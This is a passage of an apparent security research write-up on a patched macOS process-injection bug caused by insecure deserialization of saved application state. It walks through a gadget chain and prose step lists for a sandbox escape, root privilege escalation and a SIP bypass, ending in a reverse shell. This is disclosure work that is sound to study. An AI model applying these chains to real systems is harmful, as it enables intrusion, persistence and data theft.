This means that when a secure coder is created, -decodeObjectForKey: is no longer allowed, but -decodeObjectOfClass:forKey: must be used.
That makes exploitable vulnerabilities significantly harder, but it could still happen. One thing to note here is that subclasses of the specified class are allowed. If, for example, the NSObject class is specified, then all classes implementing NSCoding are still allowed. If only NSDictionary are expected and an imported framework contains a rarely used and vulnerable subclass of NSDictionary, then this could also create a vulnerability.
In all of Appleβs operating systems, these serialized objects are used all over the place, often for inter-process exchange of data. For example, NSXPCConnection heavily relies on secure serialization for implementing remote method calls. In iMessage, these serialized objects are even exchanged with other users over the network. In such cases it is very important that secure coding is always enabled.
Creating a malicious serialized object
In the data.data file for saved states, objects were stored using an NSKeyedArchiver without secure coding enabled. This means we could include objects of any class that implements the NSCoding protocol. The likely reason for this is that applications can extend the saved state with their own objects, and because the saved state functionality is older than NSSecureCoding, Apple couldnβt just upgrade this to secure coding, as this could break third-party applications.
To exploit this, we wanted a method for constructing a chain of objects that could allows us to execute arbitrary code. However, no project similar to ysoserial for Objective-C appears to exist and we could not find other examples of abusing insecure deserialization in macOS. In Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641 Samuel GroΓ of Google Project Zero describes an attack against a secure coder by abusing a vulnerability in NSSharedKeyDictionary, an uncommon subclass of NSDictionary. As this vulnerability is now fixed, we couldnβt use this.
By decompiling a large number of -initWithCoder: methods in AppKit, we eventually found a combination of 2 objects that we could use to call arbitrary Objective-C methods on another deserialized object.
We start with NSRuleEditor. The -initWithCoder: method of this class creates a binding to an object from the same archive with a key path also obtained from the archive.
Bindings are a reactive programming technique in Cocoa. It makes it possible to directly bind a model to a view, without the need for the boilerplate code of a controller. Whenever a value in the model changes, or the user makes a change in the view, the changes are automatically propagated.
This binds the property binding of the receiver to the keyPath of observable. A keypath a string that can be used, for example, to access nested properties of the object. But the more common method for creating bindings is by creating them as part of a XIB file in Xcode.
For example, suppose the model is a class Person, which has a property @property (readwrite, copy) NSString *name;. Then you could bind the βvalueβ of a text field to the βnameβ keypath of a Person to create a field that shows (and can edit) the personβs name.
In the XIB editor, this would be created as follows:
The different options for what a keypath can mean are actually quite complicated. For example, when binding with a keypath of βfooβ, it would first check if one the methods getFoo, foo, isFoo and _foo exists. This would usually be used to access a property of the object, but this is not required. When a binding is created, the method will be called immediately when creating the binding, to provide an initial value. It does not matter if that method actually returns void. This means that by creating a binding during deserialization, we can use this to call zero-argument methods on other deserialized objects!
In this case we use it to call -draw on the next object.
The next object we use is an NSCustomImageRep object. This obtains a selector (a method name) as a string and an object from the archive. When the -draw method is called, it invokes the method from the selector on the object. It passes itself as the first argument:
By deserializing these two classes we can now call zero-argument methods and multiple argument methods, although the first argument will be an NSCustomImageRep object and the remaining arguments will be whatever happens to still be in those registers. Nevertheless, is a very powerful primitive. Weβll cover the rest of the chain we used in a future blog post.
Exploitation
Sandbox escape
First of all, we escaped the Mac Application sandbox with this vulnerability. To explain that, some more background on the saved state is necessary.
In a sandboxed application, many files that would be stored in ~/Library are stored in a separate container instead. So instead of saving its state in:
Apparently, when the system is shut down while an application is still running (when the prompt is shown asking the user whether to reopen the windows the next time), the first location is symlinked to the second one by talagent. We are unsure of why, it might have something to do with upgrading an application to a new version which is sandboxed.
Secondly, most applications do not have access to all files. Sandboxed applications are very restricted of course, but with the addition of TCC even accessing the Downloads, Documents, etc. folders require user approval. If the application would open an open or save panel, it would be quite inconvenient if the user could only see the files that that application has access to. To solve this, a different process is launched when opening such a panel: com.apple.appkit.xpc.openAndSavePanelService. Even though the window itself is part of the application, its contents are drawn by openAndSavePanelService. This is an XPC service which has full access to all files. When the user selects a file in the panel, the application gains temporary access to that file. This way, users can still browse their entire disk even in applications that do not have permission to list those files.
As it is an XPC service with service type Application, it is launched separately for each app.
What we noticed is that this XPC Service reads its saved state, but using the bundle ID of the app that launched it! As this panel might be part of the saved state of multiple applications, it does make some sense that it would need to separate its state per application.
As it turns out, it reads its saved state from the location outside of the container, but with the applicationβs bundle ID:
But as we mentioned if the app was ever open when the user shut down their computer, then this will be a symlink to the container path.
Thus, we can escape the sandbox in the following way:
Wait for the user to shut down while the app is open, if the symlink does not yet exist.
Write malicious data.data and windows.plist files inside the appβs own container.
Open an NSOpenPanel or NSSavePanel.
The com.apple.appkit.xpc.openAndSavePanelService process will now deserialize the malicious object, giving us code execution in a non-sandboxed process.
This was fixed earlier than the other issues, as CVE-2021-30659 in macOS 11.3. Apple addressed this by no longer loading the state from the same location in com.apple.appkit.xpc.openAndSavePanelService.
Privilege escalation
By injecting our code into an application with a specific entitlement, we can elevate our privileges to root. For this, we could apply the technique explained by A2nkF in Unauthd - Logic bugs FTW.
Some applications have an entitlement of com.apple.private.AuthorizationServices containing the value system.install.apple-software. This means that this application is allowed to install packages that have a signature generated by Apple without authorization from the user. For example, βInstall Command Line Developer Tools.appβ and βBootcamp Assistant.appβ have this entitlement. A2nkF also found a package signed by Apple that contains a vulnerability: macOSPublicBetaAccessUtility.pkg. When this package is installed to a specific disk, it will run (as root) a post-install script from that disk. The script assumes it is being installed to a disk containing macOS, but this is not checked. Therefore, by creating a malicious script at the same location it is possible to execute code as root by installing this package.
The exploitation steps are as follows:
Create a RAM disk and copy a malicious script to the path that will be executed by macOSPublicBetaAccessUtility.pkg.
Inject our code into an application with the com.apple.private.AuthorizationServices entitlement containing system.install.apple-software by creating the windows.plist and data.data files for that application and then launching it.
Use the injected code to install the macOSPublicBetaAccessUtility.pkg package to the RAM disk.
Wait for the post-install script to run.
In the writeup from A2nkF, the post-install script ran without the filesystem restrictions of SIP. It inherited this from the installation process, which needs it as package installation might need to write to SIP protected locations. This was fixed by Apple: post- and pre-install scripts are no longer SIP exempt. The package and its privilege escalation can still be used, however, as Apple still uses the same vulnerable installer package.
SIP filesystem bypass
Now that we have escaped the sandbox and elevated our privilages to root, we did want to bypass SIP as well. To do this, we looked around at all available applications to find one with a suitable entitlement. Eventually, we found something on the macOS Big Sur Beta installation disk image: βmacOS Update Assistant.appβ has the com.apple.rootless.install.heritable entitlement. This means that this process can write to all SIP protected locations (and it is heritable, which is convenient because we can just spawn a shell). Although it is supposed to be used only during the beta installation, we can just copy it to a normal macOS environment and run it there.
The exploitation for this is quite simple:
Create malicious windows.plist and data.data files for βmacOS Update Assistant.appβ.
Launch βmacOS Update Assistant.appβ.
When exempt from SIPβs filesystem restrictions, we can read all files from protected locations, such as the userβs Mail.app mailbox. We can also modify the TCC database, which means we can grant ourself permission to access the webcam, microphone, etc. We could also persist our malware on locations which are protected by SIP, making it very difficult to remove by anyone other than Apple. Finally, we can change the database of approved kernel extensions. This means that we could load a new kernel extension silently, without user approval. When combined with a vulnerable kernel extension (or a codesigning certificate that allows signing kernel extensions), we would have been able to gain kernel code execution, which would allow disabling all other restrictions too.
Demo
We recorded the following video to demonstrate the different steps. It first shows that the application βSandboxβ is sandboxed, then it escapes its sandbox and launches βPrivescβ. This elevates privileges to root and launches βSIP Bypassβ. Finally, this opens a reverse shell that is exempt from SIPβs filesystem restrictions, which is demonstrated by writing a file in /var/db/SystemPolicyConfiguration (the location where the database of approved kernel modules is stored):
The fix
Apple first fixed the sandbox escape in 11.3, by no longer reading the saved state of the application in com.apple.appkit.xpc.openAndSavePanelService (CVE-2021-30659).
Fixing the rest of the vulnerability was more complicated. Third-party applications may store their own objects in the saved state and these objects might not support secure coding. This brings us back to the method from the introduction: -applicationSupportsSecureRestorableState:. Applications can now opt-in to requiring secure coding for their saved state by returning TRUE from this method. Unless an app opts in, it will keep allowing non-secure coding, which means process injection might remain possible.
This does highlight one issue with the current design of these security measures: downgrade attacks. The code signature (and therefore entitlements) of an application will remain valid for a long time, and the TCC permissions of an application will still work if the application is downgraded. A non-sandboxed application could just silently download an older, vulnerable version of an application and exploit that. For the SIP bypass this would not work, as βmacOS Update Assistant.appβ does not run on macOS Monterey because certain private frameworks no longer contain the necessary symbols. But that is a coincidental fix, in many other cases older applications may still run fine. This vulnerability will therefore be present for as long as there is backwards compatibility with older macOS applications!
Nevertheless, if you write an Objective-C application, please make sure you add -applicationSupportsSecureRestorableState: to return TRUE and to adapt secure coding for all classes used for your saved states!
Conclusion
In the current security architecture of macOS, process injection is a powerful technique. A generic process injection vulnerability can be used to escape the sandbox, elevate privileges to root and to bypass SIPβs filesystem restrictions. We have demonstrated how we used the use of insecure deserialization in the loading of an applicationβs saved state to inject into any Cocoa process. This was addressed by Apple in the macOS Monterey update.